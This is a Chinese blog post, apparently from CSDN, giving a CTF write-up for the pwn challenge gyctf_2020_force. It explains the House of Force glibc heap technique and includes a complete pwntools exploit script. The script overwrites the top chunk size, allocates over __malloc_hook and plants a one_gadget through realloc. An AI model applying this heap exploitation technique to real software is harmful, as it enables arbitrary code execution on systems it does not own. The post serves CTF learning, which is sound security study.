【house of force】gyctf_2020_force

最新推荐文章于 2023-04-11 18:39:21 发布
最新推荐文章于 2023-04-11 18:39:21 发布
阅读量147 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/115919713
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

【house of force】gyctf_2020_force

1.ida分析

  1. 申请任意大小的堆块,存在堆溢出

    在这里插入图片描述

2.思路

  1. 申请一个较大的堆块,泄露libc的地址

  2. 修改top chunk的地址为0xffffffffffffffff

  3. 计算top chunk到malloc_hook-0x33的距离(malloc_hook-0x23 是一个合法的chunk)其实这个0x30-0x37应该都可以,malloc在分配的时候会自己进行对齐

    在这里插入图片描述

    在这里插入图片描述

  4. 通过申请到malloc上方的chunk修改malloc_hook以及realloc_chunk

    在这里插入图片描述

  5. 这里的注意点是onegadget 使用条件可能不满足,需要通过realloc中的push调整堆栈,是其满足$rsp-0x??=0的条件

    在这里插入图片描述

    在这里插入图片描述

  6. 再次申请chunk触发malloc realloc_hook

    在这里插入图片描述

3.exp

from pwn import *
p = process('./gyctf_2020_force')
#p = remote('node3.buuoj.cn',27989)
context.log_level = 'debug'
#elf = ELF('./libc-2.23.so')
elf = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def add(size,cont):
	p.sendlineafter('s\n','1')
	p.sendlineafter('e\n',str(size))
	p.recvuntil('addr 0x')
	binaddr = int(p.recv(12),16)
	log.success('bin==>'+hex(binaddr))
	p.sendlineafter('t\n',str(cont))
	return binaddr

libc_base = add(0x200000,'aa') + 0x200ff0
log.success('libc_base==>'+hex(libc_base))

top = add(0x18,'b'*0x10+p64(0)+p64(0xffffffffffffffff)) + 0x10
log.success('top chunk==>'+hex(top))

malloc_hook =  elf.sym['__malloc_hook'] + libc_base
realloc_hook = elf.sym['__libc_realloc'] + libc_base

log.success('malloc_hook==>'+hex(malloc_hook))
log.success('realloc_hook==>'+hex(realloc_hook))
one = 0x4527a + libc_base
add(malloc_hook-top-0x30,'a')
gdb.attach(p)
pause()
add(0x10,'a'*8 + p64(one) + p64(realloc_hook+0x10))
gdb.attach(p)
pause()

p.interactive()
huzai9527
关注
专栏目录
kc_house_data.rar
10-11
KC_House_Data.csv 文件是 King County(金县)的房价数据集,通常用于教学和实践机器学习项目,特别是在华盛顿大学的课程中。这个数据集包含了大量关于房屋特征和价格的信息,为初学者提供了理解如何利用统计和机器...
BUUCTF【gyctf_2020_force】(house of force)
weixin_51055545的博客
01-29 647
一道题学习 House of force 首先说明一下House of force的利用条件: 1.能够通过堆溢出等方法控制到topchunk的size 2.分配的大小没有限制,即可以申请任意大小的堆块 3.能够泄露出堆地址(topchunk) House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的
[BUUCTF]PWN——gyctf_2020_forcehouse of force
mcmuyanga的博客
01-29 971
gyctf_2020_force 附件 步骤
Pwn-gyctf_2020_force
fayinq的博客
03-13 398
gyctf_2020_force 这个题目是一个新的知识点,house_of_force,第一次看,以前没见过。 HOUSE_OF_FORCE: 使用条件: 能够使用溢出等手段,修改top_chunk的大小 能够自由分配chunk大小,不会被限制 基本原理: 在malloc之中,会有一个topchunk的size大小,如果说,能够malloc一个chunk的大小大于topchunk的大小(一般是0x20df1这种个大小),那么chunk就会去到vmmap映射出来的另一端地址,一般来说会在libc上面一点
gyctf_2020_force
z1r0的博客
01-25 852
gyctf_2020_force 查看保护 当size小于0x50时堆溢出,这里只有add没有show和edit。size随便申请多大都可以。 house of force吧,改写top chunk的size为0xFFFFFFFFFFFFFFFF因为在glibc2.23下的源码中这里是无符号写成-1时则为0xFFFFFFFFFFFFFFFF。详细可以看z1r0’s blog 当创建top chunk可以分配的大小的,所创建的chunk的位置为top chunk与该chunk size的偏移 所以这里可以
gyctf_2020_force【write up】
m0_73756460的博客
04-11 131
BUUCTF刷题gyctf_2020_force【write up】
House Price Regression.zip_house price_jupyter_xgboost_房价预测
07-14
经典的房价预测问题,用jupyter notebook编写的简单实现。使用XGBoost模块进行学习预测。
jj.rar_house_jjdsw txt
09-19
【描述】"Hello occurrence of the sofa couch Stephen Safar manual valve is time to kill the Orient House" 这句话看起来不太符合标准的中文语句,可能是拼写错误或者是引用自某段英文内容。不过,我们可以从中...
8-2(build-house).rar_house_房子 android
09-23
在Android平台上,游戏开发是一项非常受欢迎的技术实践,尤其对于初学者来说,它是了解移动应用开发的一个好起点。本文将深入探讨“堆房子”这个小游戏,它是一个基于Android原生开发的项目,旨在帮助用户理解...
system_of_house_measure.rar_house
09-21
《房屋测量系统详解》 在数字化时代,房屋测量已经不再局限于传统的实地测量工具,而是借助先进的计算机技术,形成了一套高效、精准的房屋测量系统。本文将深入探讨这个系统的基本构成,以及它如何集成地图软件要素...
BUUCTF-PWN gyctf_2020_forcehouse of force
weixin_44145820的博客
04-15 1416
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
PWN-PRACTICE-BUUCTF-24
P1umH0的博客
09-09 303
PWN-PRACTICE-BUUCTF-24
BUUCTF--[BJDCTF2020]JustRE
Hk_Mayfly的博客
04-07 1430
测试文件:https://www.lanzous.com/ib3dq9c 代码分析 1 BOOL __stdcall DialogFunc(HWND hWnd, UINT a2, WPARAM a3, LPARAM a4) 2 { 3 CHAR String; // [esp+0h] [ebp-64h] 4 5 if ( a2 != 272 ) 6 { ...
gyctf_2020_borrowstack
qq_42728977的博客
04-12 567
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
GYCTF2020_Writeup
Lethe's Blog
03-15 2640
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
House of force —— gyctf_2020_force
PLpa的博客
08-13 920
前言: House of force是属于House of xxx系列的利用方法,House of xxx是2004年《The Malloc Maleficarum-Glibc Malloc Exploitation Techniques》中提出的一系列针对glibc堆分配机制的利用方法。 想要利用House of force,需要以下条件: 1.能够以溢出等方式控制top chunk的size域。 2.能够自由的分配堆的大小 解题思路 保护机制 保护全开,64位。 IDA查看伪代码 程序有两个功能,
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1647
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
i春秋2020新春战役PWN之force
seaaseesa的博客
02-26 814
House of force能够使我们将堆申请到任意地址,满足以下条件,即可达到利用 能够改写top chunk的size域 能够自由控制堆分配大小 能够知道目标地址与top chunk地址之间的距离(可以泄露地址,计算出偏移) 详细见CTF-WIKIhttps://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/house_of_force...
house_data = raw_house
最新发布
06-11
`house_data = raw_house` 是将 pandas DataFrame 对象 `raw_house` 复制给 `house_data` 的一个操作。这个操作并没有创建一个新的 DataFrame 对象,而是将 `house_data` 这个变量指向了 `raw_house` 这个 DataFrame 对象在内存中的位置。 这样做的目的可能是为了在 `house_data` 上进行一系列的数据处理和分析操作,而不改变原始的数据 `raw_house`,以保留原始的数据集。同时,也可以通过改变 `house_data` 中的数据来进行数据清洗和特征工程等操作,以便后续的模型训练和预测等任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值